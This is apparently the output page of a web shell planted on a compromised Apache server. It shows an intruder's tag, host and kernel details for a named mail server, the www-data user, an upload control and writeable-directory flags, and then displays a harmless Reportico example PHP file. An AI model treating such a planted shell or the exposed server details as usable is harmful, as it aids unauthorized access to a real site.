Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/examples/project-menu.php
<?php
include (__DIR__."/header.php");

$description = " <br><br> The menu() method presents the report project menu and allows user access to all reports saved within the project folder. There must already have been a report created from the Reportico Administration menu and reports created in the designer.";
$example_description = "In the example below, we load the tutorials project and present the menu";

$usage_method = "
<?php
      \Reportico\Engine\Builder::build()
          ...
          ->project(\"project\")
          ->menu();
?>
";

include (__DIR__."/content.php");
include (__DIR__."/trailer.php");
?>

Hry